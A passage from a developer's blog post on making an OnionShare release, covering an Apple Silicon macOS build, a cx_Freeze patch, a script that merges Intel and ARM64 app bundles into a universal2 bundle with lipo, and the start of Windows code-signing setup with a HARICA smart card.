<span class="w"> </span><span class="no">brew install libiodbc</span>
<span class="w"> </span><span class="no">cd ~/Downloads</span>
<span class="w"> </span><span class="no">curl -O -L https://github.com/PostgresApp/PostgresApp/releases/download/v2.6.5/Postgres-2.6.5-14.dmg</span>
<span class="w"> </span><span class="no">hdiutil attach Postgres-2.6.5-14.dmg</span>
<span class="w"> </span><span class="no">cp -r /Volumes/Postgres-2.6.5-14/Postgres.app /Applications/</span>
<span class="w"> </span><span class="no">hdiutil detach /Volumes/Postgres-2.6.5-14</span>
</pre></div>
<p>So before building the app bundle:</p>
<ul>
<li>Installed <code>libiodbc</code> by running: <code>brew install libiodbc</code>.</li>
<li>Downloaded <code>Postgres-2.6.5-14.dmg</code>, opened it, and dragged <code>Postgres.app</code> to Applications.</li>
</ul>
<h3 id="building-the-app-bundle">Building the app bundle</h3><p>Here's the "Build OnionShare step" from the GitHub Actions workflow:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">rm -rf build/OnionShare.app/Contents/Resources/lib</span>
<span class="w"> </span><span class="no">mv build/exe.macosx-10.9-universal2-3.11/lib build/OnionShare.app/Contents/Resources/</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>So I simply have to run these manually:</p>
<pre><code>% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
--snip--
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/Qt/plugins/sqldrivers/libqsqlodbc.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/PySide6/Qt/plugins/sqldrivers/libqsqlodbc.dylib
copying /usr/local/opt/libiodbc/lib/libiodbc.2.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/libiodbc.2.dylib
error: [Errno 2] No such file or directory: '/usr/local/opt/libiodbc/lib/libiodbc.2.dylib'
</code></pre>
<p>Hmm, it can't find <code>libiodbc.2.dylib</code>, but I did install the <code>libiodbc</code> package.</p>
<p>Ahh, it looks like Homebrew put it in <code>/opt/homebrew/opt/libiodbc/</code>, but my build script is looking for it in <code>/usr/local/opt/libiodbc/</code>. I can fix that by creating a symlink and trying again:</p>
<pre><code>% sudo mkdir /usr/local/opt
% sudo ln -s /opt/homebrew/opt/libiodbc /usr/local/opt/libiodbc
% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
--snip--
Setting relative_reference_path for: Mach-O File: /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/initscripts/frozen_application_license.txt
Resolved rpath:
Loaded libraries:
Applying AdHocSignature
/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/frozen_application_license.txt: No such file or directory
error: [Errno 2] No such file or directory: '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/frozen_application_license.txt'
</code></pre>
<p>Nice, that problem is fixed, but now I'm hitting another.</p>
<p><code>frozen_application_license.txt</code> is a license file that cx_Freeze adds to binaries it creates, but for some reason it didn't copy it into the app bundle. But even if it did, the output says it's trying to sign that file, and in macOS you can't sign text files, only Mach-O binaries, so it shouldn't be doing that. What's going on?</p>
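<p>One way to decide whether a file is even signable is to check its first four bytes for a Mach-O magic number instead of trusting the filename. A minimal sketch (the magic values come from the Mach-O header format; this helper is illustrative, not cx_Freeze's actual logic):</p>

```python
import struct

# Mach-O magic numbers: 32-bit and 64-bit headers in both byte orders,
# plus the "fat" (universal) header used by multi-architecture binaries.
MACHO_MAGICS = {
    0xFEEDFACE,  # MH_MAGIC (32-bit)
    0xFEEDFACF,  # MH_MAGIC_64 (64-bit)
    0xCEFAEDFE,  # MH_CIGAM (byte-swapped 32-bit)
    0xCFFAEDFE,  # MH_CIGAM_64 (byte-swapped 64-bit)
    0xCAFEBABE,  # FAT_MAGIC (universal)
    0xBEBAFECA,  # FAT_CIGAM
}

def is_macho(path):
    """Return True if the file begins with a Mach-O (or fat) magic number."""
    with open(path, "rb") as f:
        header = f.read(4)
    if len(header) < 4:
        return False
    (magic,) = struct.unpack(">I", header)
    return magic in MACHO_MAGICS
```

<p>A check like this would skip text files like <code>frozen_application_license.txt</code> without needing per-extension special cases.</p>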
<h3 id="fixing-cx-freeze">Fixing cx_Freeze</h3><p>I spent some time searching the internet and reading issues in the <a href="https://github.com/marcelotduarte/cx_Freeze">cx_Freeze GitHub repo</a>, but still didn't come to a firm solution. So I decided to dig into the source code and see what's going on. In cx_Freeze's <a href="https://github.com/marcelotduarte/cx_Freeze/blob/main/cx_Freeze/command/bdist_mac.py"><code>cx_Freeze/command/bdist_mac.py</code></a>, I see a few relevant functions, including one called <code>set_relative_reference_paths</code>. Here's the code for that function:</p>
<div class="hll"><pre><span></span><span class="k">def</span> <span class="nf">set_relative_reference_paths</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">build_dir</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">bin_dir</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Make all the references from included Mach-O files to other included</span>
<span class="sd"> Mach-O files relative.</span>
<span class="sd"> """</span>
<span class="n">darwin_file</span><span class="p">:</span> <span class="n">DarwinFile</span>
<span class="k">for</span> <span class="n">darwin_file</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">darwin_tracker</span><span class="p">:</span>
<span class="c1"># get the relative path to darwin_file in build directory</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Setting relative_reference_path for: </span><span class="si">{</span><span class="n">darwin_file</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="n">relative_copy_dest</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">relpath</span><span class="p">(</span>
<span class="n">darwin_file</span><span class="o">.</span><span class="n">getBuildPath</span><span class="p">(),</span> <span class="n">build_dir</span>
<span class="p">)</span>
<span class="c1"># figure out directory where it will go in binary directory for</span>
<span class="c1"># .app bundle, this would be the Content/MacOS subdirectory in</span>
<span class="c1"># bundle. This is the file that needs to have its dynamic load</span>
<span class="c1"># references updated.</span>
<span class="n">file_path_in_bin_dir</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">bin_dir</span><span class="p">,</span> <span class="n">relative_copy_dest</span><span class="p">)</span>
<span class="c1"># for each file that this darwin_file references, update the</span>
<span class="c1"># reference as necessary; if the file is copied into the binary</span>
<span class="c1"># package, change the reference to be relative to @executable_path</span>
<span class="c1"># (so an .app bundle will work wherever it is moved)</span>
<span class="k">for</span> <span class="n">reference</span> <span class="ow">in</span> <span class="n">darwin_file</span><span class="o">.</span><span class="n">getMachOReferenceList</span><span class="p">():</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">reference</span><span class="o">.</span><span class="n">is_copied</span><span class="p">:</span>
<span class="c1"># referenced file not copied -- assume this is a system</span>
<span class="c1"># file that will also be present on the user's machine,</span>
<span class="c1"># and do not change reference</span>
<span class="k">continue</span>
<span class="c1"># this is the reference in the machO file that needs to be</span>
<span class="c1"># updated</span>
<span class="n">raw_path</span> <span class="o">=</span> <span class="n">reference</span><span class="o">.</span><span class="n">raw_path</span>
<span class="n">ref_target_file</span><span class="p">:</span> <span class="n">DarwinFile</span> <span class="o">=</span> <span class="n">reference</span><span class="o">.</span><span class="n">target_file</span>
<span class="c1"># this is where file copied in build dir</span>
<span class="n">abs_build_dest</span> <span class="o">=</span> <span class="n">ref_target_file</span><span class="o">.</span><span class="n">getBuildPath</span><span class="p">()</span>
<span class="n">rel_build_dest</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">relpath</span><span class="p">(</span><span class="n">abs_build_dest</span><span class="p">,</span> <span class="n">build_dir</span><span class="p">)</span>
<span class="n">exe_path</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">"@executable_path/</span><span class="si">{</span><span class="n">rel_build_dest</span><span class="si">}</span><span class="s2">"</span>
<span class="n">changeLoadReference</span><span class="p">(</span>
<span class="n">file_path_in_bin_dir</span><span class="p">,</span>
<span class="n">oldReference</span><span class="o">=</span><span class="n">raw_path</span><span class="p">,</span>
<span class="n">newReference</span><span class="o">=</span><span class="n">exe_path</span><span class="p">,</span>
<span class="n">VERBOSE</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span>
<span class="p">)</span>
<span class="n">applyAdHocSignature</span><span class="p">(</span><span class="n">file_path_in_bin_dir</span><span class="p">)</span>
</pre></div>
<p>This is where the problem is -- remember, this is part of the error message:</p>
<pre><code>Setting relative_reference_path for: Mach-O File: /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/initscripts/frozen_application_license.txt
</code></pre>
<p>This same file also includes a function called <code>set_absolute_reference_paths</code>, and that function has some logic to specifically skip <code>txt</code> and <code>zip</code> files, and I think some similar logic here might fix my problem. So I forked cx_Freeze and patched the code. Here's my patch:</p>
<div class="hll"><pre><span></span><span class="gh">diff --git a/cx_Freeze/command/bdist_mac.py b/cx_Freeze/command/bdist_mac.py</span>
<span class="gh">index 44cb03e..0cee824 100644</span>
<span class="gd">--- a/cx_Freeze/command/bdist_mac.py</span>
<span class="gi">+++ b/cx_Freeze/command/bdist_mac.py</span>
<span class="gu">@@ -332,6 +332,10 @@ class BdistMac(Command):</span>
<span class="w"> </span> darwin_file: DarwinFile
<span class="w"> </span> for darwin_file in self.darwin_tracker:
<span class="gi">+ # Skip text files</span>
<span class="gi">+ if str(darwin_file.path).endswith(".txt"):</span>
<span class="gi">+ continue</span>
<span class="gi">+</span>
<span class="w"> </span> # get the relative path to darwin_file in build directory
<span class="w"> </span> print(f"Setting relative_reference_path for: {darwin_file}")
<span class="w"> </span> relative_copy_dest = os.path.relpath(
</pre></div>
<p>I ran the build again, and this time it worked! At least, until it hit this error:</p>
<pre><code>% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
--snip--
Setting relative_reference_path for: Mach-O File: /Users/user/code/onionshare/LICENSE
Resolved rpath:
Loaded libraries:
Applying AdHocSignature
/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/LICENSE: No such file or directory
error: [Errno 2] No such file or directory: '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/LICENSE'
</code></pre>
<p>The <code>LICENSE</code> file is OnionShare's license, and it gets included in the app bundle. My patch doesn't skip it, because it's not a <code>.txt</code> file. So, I'm just going to go ahead and rename it to <code>LICENSE.txt</code>, and also update <code>desktop/setup-freeze.py</code> to include <code>LICENSE.txt</code> instead of <code>LICENSE</code>. Let's see if that does the trick.</p>
<p>It finished without errors! Almost there. Before moving on, I <a href="https://github.com/marcelotduarte/cx_Freeze/pull/2102">opened a PR</a> in the cx_Freeze project with my patch.</p>
<h3 id="finishing-the-build">Finishing the build</h3><p>Again, here's the full "Build OnionShare" step in the GitHub Actions workflow:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">rm -rf build/OnionShare.app/Contents/Resources/lib</span>
<span class="w"> </span><span class="no">mv build/exe.macosx-10.9-universal2-3.11/lib build/OnionShare.app/Contents/Resources/</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>I successfully ran <code>poetry run python ./setup-freeze.py bdist_mac</code>, and now I need to run the rest of the commands:</p>
<pre><code>% rm -rf build/OnionShare.app/Contents/Resources/lib
% mv build/exe.macosx-10.9-universal2-3.11/lib build/OnionShare.app/Contents/Resources/
% poetry run python ./scripts/build-macos.py cleanup-build
--snip--
> Freed 1233 mb
</code></pre>
<p>No problems yet. Can I run the binary?</p>
<p><img src="mac-vm-onionshare.png" alt="Running the OnionShare app bundle in the Mac VM"></p>
<p>I can! I've created a working Apple Silicon binary in <code>build/OnionShare.app</code>.</p>
<h2 id="merging-app-bundles-into-a-universal2-mac-app-bundle">Merging app bundles into a universal2 Mac app bundle</h2><p>My original plan for this release was to make two versions for Mac: Intel and Apple Silicon. However, I'm <em>sooo close</em> I might as well just go the final yard and merge these two app bundles into a single universal2 app bundle.</p>
<p>In macOS, Mach-O binaries are compiled for a specific architecture, like <code>arm64</code> or <code>x86_64</code>. Using a program called <code>lipo</code>, you can merge binaries of different architectures into the same file so that it will run on either architecture -- this format is called universal2. (The original "universal" format, from back in the day, combined PowerPC and Intel architectures.)</p>
<p>According to Apple's <a href="https://developer.apple.com/documentation/apple-silicon/building-a-universal-macos-binary">documentation</a>, if you have an Intel binary called <code>x86_app</code> and an ARM64 binary called <code>arm_app</code>, you can create a universal2 binary called <code>universal_app</code> with this command:</p>
<div class="hll"><pre><span></span>lipo<span class="w"> </span>-create<span class="w"> </span>-output<span class="w"> </span>universal_app<span class="w"> </span>x86_app<span class="w"> </span>arm_app
</pre></div>
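<p>As a sanity check before and after merging, <code>lipo -archs</code> reports which architectures a file already contains. A small sketch (returns None on machines without <code>lipo</code>; illustrative only -- the merge script in this post classifies binaries with <code>file</code> output instead):</p>

```python
import shutil
import subprocess

def binary_archs(path):
    """Return the architectures in a Mach-O file, via `lipo -archs`,
    or None if lipo is unavailable or the file isn't Mach-O."""
    lipo = shutil.which("lipo")
    if lipo is None:  # not on macOS, or Xcode command line tools missing
        return None
    try:
        out = subprocess.check_output(
            [lipo, "-archs", path], stderr=subprocess.DEVNULL
        )
    except subprocess.CalledProcessError:
        return None  # lipo rejected the file
    return out.decode().split()
```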
<p>At this point in the release I have an Intel app bundle and an ARM64 app bundle. To turn these into a single universal2 app bundle, I just need a simple script that looks through all of the files in both app bundles for binaries to merge, and uses <code>lipo</code> to merge them. Hang on while I do that.</p>
<p>🎵 Programming sounds... 🎵</p>
<p>Alright, I've created a new script, <code>desktop/scripts/macos-merge-universal.py</code>, which does just this:</p>
<div class="hll"><pre><span></span><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">shutil</span>
<span class="kn">import</span> <span class="nn">click</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="k">def</span> <span class="nf">get_binary_arches</span><span class="p">(</span><span class="n">app_dir</span><span class="p">):</span>
<span class="n">universal</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">silicon</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">intel</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">dirpath</span><span class="p">,</span> <span class="n">dirnames</span><span class="p">,</span> <span class="n">filenames</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">app_dir</span><span class="p">):</span>
<span class="k">for</span> <span class="n">basename</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
<span class="n">filename</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">dirpath</span><span class="p">,</span> <span class="n">basename</span><span class="p">)</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">isfile</span><span class="p">(</span><span class="n">filename</span><span class="p">):</span>
<span class="n">out</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">([</span><span class="s2">"file"</span><span class="p">,</span> <span class="n">filename</span><span class="p">])</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s2">"utf-8"</span><span class="p">)</span>
<span class="k">if</span> <span class="p">(</span>
<span class="s2">"Mach-O 64-bit executable"</span> <span class="ow">in</span> <span class="n">out</span>
<span class="ow">or</span> <span class="s2">"Mach-O 64-bit bundle"</span> <span class="ow">in</span> <span class="n">out</span>
<span class="ow">or</span> <span class="s2">"Mach-O 64-bit dynamically linked shared library"</span> <span class="ow">in</span> <span class="n">out</span>
<span class="p">):</span>
<span class="n">arm64</span><span class="p">,</span> <span class="n">x86</span> <span class="o">=</span> <span class="kc">False</span><span class="p">,</span> <span class="kc">False</span>
<span class="k">if</span> <span class="s2">"arm64"</span> <span class="ow">in</span> <span class="n">out</span><span class="p">:</span>
<span class="n">arm64</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="s2">"x86_64"</span> <span class="ow">in</span> <span class="n">out</span><span class="p">:</span>
<span class="n">x86</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="n">arm64</span> <span class="ow">and</span> <span class="n">x86</span><span class="p">:</span>
<span class="n">universal</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">arm64</span><span class="p">:</span>
<span class="n">silicon</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">x86</span><span class="p">:</span>
<span class="n">intel</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
<span class="k">return</span> <span class="n">universal</span><span class="p">,</span> <span class="n">silicon</span><span class="p">,</span> <span class="n">intel</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">command</span><span class="p">()</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"intel_app"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="n">click</span><span class="o">.</span><span class="n">Path</span><span class="p">(</span><span class="n">exists</span><span class="o">=</span><span class="kc">True</span><span class="p">))</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"silicon_app"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="n">click</span><span class="o">.</span><span class="n">Path</span><span class="p">(</span><span class="n">exists</span><span class="o">=</span><span class="kc">True</span><span class="p">))</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"output_app"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="n">click</span><span class="o">.</span><span class="n">Path</span><span class="p">(</span><span class="n">exists</span><span class="o">=</span><span class="kc">False</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">(</span><span class="n">intel_app</span><span class="p">,</span> <span class="n">silicon_app</span><span class="p">,</span> <span class="n">output_app</span><span class="p">):</span>
<span class="c1"># Get the list of binaries in each app</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Looking up binaries from Intel app:"</span><span class="p">,</span> <span class="n">intel_app</span><span class="p">)</span>
<span class="n">intel_universal</span><span class="p">,</span> <span class="n">intel_silicon</span><span class="p">,</span> <span class="n">intel_intel</span> <span class="o">=</span> <span class="n">get_binary_arches</span><span class="p">(</span><span class="n">intel_app</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Looking up binaries from Silicon app:"</span><span class="p">,</span> <span class="n">silicon_app</span><span class="p">)</span>
<span class="n">silicon_universal</span><span class="p">,</span> <span class="n">silicon_silicon</span><span class="p">,</span> <span class="n">silicon_intel</span> <span class="o">=</span> <span class="n">get_binary_arches</span><span class="p">(</span><span class="n">silicon_app</span><span class="p">)</span>
<span class="c1"># Find which binaries should be merged</span>
<span class="n">intel_intel_filenames</span> <span class="o">=</span> <span class="p">[</span><span class="n">i</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">intel_app</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span> <span class="p">:]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">intel_intel</span><span class="p">]</span>
<span class="n">silicon_silicon_filenames</span> <span class="o">=</span> <span class="p">[</span><span class="n">i</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">silicon_app</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span> <span class="p">:]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">silicon_silicon</span><span class="p">]</span>
<span class="n">intersection</span> <span class="o">=</span> <span class="nb">set</span><span class="p">(</span><span class="n">intel_intel_filenames</span><span class="p">)</span><span class="o">.</span><span class="n">intersection</span><span class="p">(</span>
<span class="nb">set</span><span class="p">(</span><span class="n">silicon_silicon_filenames</span><span class="p">)</span>
<span class="p">)</span>
<span class="c1"># Copy the Silicon app to the output app</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Copying the app bundle for the output app"</span><span class="p">)</span>
<span class="n">shutil</span><span class="o">.</span><span class="n">copytree</span><span class="p">(</span><span class="n">silicon_app</span><span class="p">,</span> <span class="n">output_app</span><span class="p">,</span> <span class="n">symlinks</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="c1"># Merge them</span>
<span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">intersection</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Merging </span><span class="si">{</span><span class="n">filename</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="n">intel_binary</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">intel_app</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
<span class="n">silicon_binary</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">silicon_app</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
<span class="n">output_binary</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">output_app</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">(</span>
<span class="p">[</span><span class="s2">"lipo"</span><span class="p">,</span> <span class="s2">"-create"</span><span class="p">,</span> <span class="n">intel_binary</span><span class="p">,</span> <span class="n">silicon_binary</span><span class="p">,</span> <span class="s2">"-output"</span><span class="p">,</span> <span class="n">output_binary</span><span class="p">]</span>
<span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Merge complete: </span><span class="si">{</span><span class="n">output_app</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</pre></div>
<p>I put the ARM64 app bundle in a folder called <code>~/tmp/arm64</code> and the Intel app bundle in <code>~/tmp/intel</code>, and I made a new empty folder called <code>~/tmp/universal2</code>. Let's see this script in action:</p>
<pre><code>% poetry run ./scripts/macos-merge-universal.py ~/tmp/intel/OnionShare.app ~/tmp/arm64/OnionShare.app ~/tmp/universal2/OnionShare.app
Looking up binaries from Intel app: /Users/user/tmp/intel/OnionShare.app
Looking up binaries from Silicon app: /Users/user/tmp/arm64/OnionShare.app
Copying the app bundle for the output app
Merging Contents/Resources/lib/psutil/_psutil_posix.abi3.so
Merging Contents/Resources/lib/zope/interface/_zope_interface_coptimizations.cpython-311-darwin.so
Merging Contents/Resources/lib/psutil/_psutil_osx.abi3.so
Merging Contents/Resources/lib/libiodbc.2.dylib
Merging Contents/Resources/lib/charset_normalizer/md.cpython-311-darwin.so
Merging Contents/MacOS/onionshare
Merging Contents/MacOS/onionshare-cli
Merging Contents/Resources/lib/charset_normalizer/md__mypyc.cpython-311-darwin.so
Merging Contents/Resources/lib/_cffi_backend.cpython-311-darwin.so
Merge complete: /Users/user/tmp/universal2/OnionShare.app
</code></pre>
<p>It found that <code>onionshare-cli</code> and <code>onionshare</code> needed to be merged, but it also found a bunch of other binaries that needed merging which I didn't know about. I also expected that I'd have to merge all of the pluggable transports that I built with Go (<code>obfs4proxy</code>, <code>snowflake-client</code>, and <code>meek-client</code>) but was pleasantly surprised to find that I didn't have to. It turns out that if you're using the ARM64 Go compiler, it makes universal2 binaries by default.</p>
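<p>That claim is easy to check from first principles: a universal (fat) Mach-O file starts with the big-endian magic <code>0xCAFEBABE</code> (or <code>0xCAFEBABF</code>), while a thin 64-bit Mach-O starts with <code>0xFEEDFACF</code>. On macOS you'd normally just run <code>lipo -archs</code>, but here's a rough, platform-independent sketch — the <code>macho_kind()</code> helper is my own illustration, not part of OnionShare:</p>

```python
import struct

# Mach-O magic numbers. Fat headers are stored big-endian on disk;
# thin 64-bit Mach-O headers are little-endian on Intel/ARM Macs.
FAT_MAGIC = 0xCAFEBABE       # universal (fat) binary
FAT_MAGIC_64 = 0xCAFEBABF    # fat binary with 64-bit offsets
MACHO_MAGIC_64 = 0xFEEDFACF  # thin 64-bit Mach-O


def macho_kind(path):
    """Classify a file as 'universal', 'thin', or 'not mach-o' by its magic."""
    with open(path, "rb") as f:
        header = f.read(4)
    if len(header) < 4:
        return "not mach-o"
    big = struct.unpack(">I", header)[0]
    little = struct.unpack("<I", header)[0]
    if big in (FAT_MAGIC, FAT_MAGIC_64):
        return "universal"
    if MACHO_MAGIC_64 in (big, little):
        return "thin"
    return "not mach-o"
```

<p>Run over a Go-built pluggable transport like <code>snowflake-client</code>, this should report <code>universal</code>, matching what the merge script found.</p>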
<p>As a final test, I copied my new universal2 binary to my two machines (my physical Intel Mac build machine, and my new ARM64 Mac VM) and tried running it in both places to make sure it would work. They work!</p>
<p>As a final step, I updated <code>RELEASE.md</code> with instructions on how to make the ARM64 app bundle, and how to merge them into a universal2 app bundle.</p>
<h2 id="making-a-development-release">Making a development release</h2><p>If this release weren't such an epic slog I would maybe just go ahead and make the final OnionShare 2.6.1 release. But as it is, I think it's much safer to make a development release, with development binaries and a development tag, and have the other OnionShare devs test it out and review my PR before making the actual release. So I decided that right now I'm going to release version 2.6.1.dev1.</p>
<p>I updated the version string from <code>2.6.1</code> to <code>2.6.1.dev1</code> in all of the places I've documented at the top of <code>RELEASE.md</code>, committed this, and then made a signed git tag:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>tag<span class="w"> </span>-s<span class="w"> </span>v2.6.1.dev1
</pre></div>
<p>I pushed my commits and my new tag, and waited for the GitHub Actions workflow to finish creating builds.</p>
<h3 id="windows-release">Windows release</h3><p>I switched to my Ubuntu computer and booted my Windows 11 VM that I <a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/#setting-up-windows-for-onionshare-development">created in part 2</a> while troubleshooting the Windows build.</p>
<p>I'll start by running <code>git fetch</code>, verifying the PGP signature on the <code>v2.6.1.dev1</code> tag I just created, and checking out that tag, so I'm sure I'm working from the correct code.</p>
<p><img src="windows-verify-tag.png" alt="Verifying the git tag in Windows"></p>
<p>Last time I set up a Windows development environment for OnionShare, but there are still a few more things I need to install to actually make a release. Also, I need to learn how to use my new HARICA smart card, which I haven't used yet! I'm going to start with that: setting up HARICA.</p>
<h4 id="setting-up-the-harica-smart-card">Setting up the HARICA smart card</h4><p>I got this USB smart card from HARICA, but that's the extent of my experience with this CA.</p>
<p><img src="harica-smartcard.jpg" alt="HARICA smart card"></p>
<p>I plugged it into my computer and then used VirtualBox to set up USB passthrough to pass it to the Windows VM. VirtualBox sees this device as "SafeNet Token JC".</p>
<p>I followed the instructions that HARICA sent when we ordered the code signing certificate: I installed the SafeNet Authentication Client software, logged into the HARICA control panel and downloaded the signed certificate, and then I used the SafeNet client software to import it into the smart card. I also changed the token password (PIN) and administrator password (PUK) on my smart card.</p>
<p><img src="safenet-software.png" alt="Viewing the smart card info"></p>
<p>Note that the token name is Science and Design Inc. As I mentioned in <a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release/">part 1</a>, the new nonprofit <a href="https://scidsg.org/">Science & Design</a>, founded by Glenn Sorrentino (who designed the beautiful OnionShare UX!), has taken on the role of fiscal sponsor for OnionShare. They purchased the new code signing certificate from HARICA.</p>
<p>Now let's see if it works. In a Developer PowerShell for VS window:</p>
<div class="hll"><pre><span></span><span class="nb">cp </span><span class="n">C</span><span class="p">:\</span><span class="n">Windows</span><span class="p">\</span><span class="n">System32</span><span class="p">\</span><span class="n">calc</span><span class="p">.</span><span class="n">exe</span> <span class="p">.</span>
